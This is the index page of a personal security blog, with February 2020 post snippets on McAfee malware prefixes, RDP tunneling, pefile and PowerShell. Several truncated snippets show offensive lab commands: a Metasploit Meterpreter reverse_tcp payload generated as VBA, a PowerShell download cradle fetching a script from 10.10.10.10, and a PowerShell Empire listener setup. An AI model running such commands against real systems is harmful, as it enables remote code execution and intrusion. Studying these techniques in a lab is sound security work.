neonprimetime security , just trying to help
Monday, February 24, 2020
McAfee Antivirus Malware Virus Type Names Prefixes
›
from here from 2017 http://download.nai.com/products/datfiles/4.x/nai/readme.txt A97M/ Macro virus that infects Microsoft ...
3 comments:
Thursday, February 20, 2020
FireEye RDP Tunneling walk-through
›
https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html setup 2 vms both set to ...
3 comments:
Saturday, February 15, 2020
python pefile ctypes kernel32.dll examples
›
import pefile import ctypes kfile = pefile.PE(r'Kernel32.dll') --- *** displays all exports such as *** --- for export in kfil...
1 comment:
Friday, February 14, 2020
Generate Meterpreter Metasploit VBA
›
msfconsole use payload/windows/meterpreter/reverse_tcp show options setg LHOST 10.10.10.10 setg LPORT 3000 generate -t vba -f meterpret...
1 comment:
Powershell download cradle
›
sample download cradle in conjuction with python -m SimpleHTTPServer 80 powershell -command "$z='http://10.10.10.10/a.ps1...
1 comment:
Powershell Empire common path
›
Powershell Empire common path in a lab test environment ./empire 1.) setup a listener listeners userlistener http execute 2.) creat...
1 comment:
Thursday, February 13, 2020
Powershell split and sort
›
In powershell if you have a ugly string like the environment path PS c:\> $env:PATH C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System...
1 comment:
‹
›
Home
View web version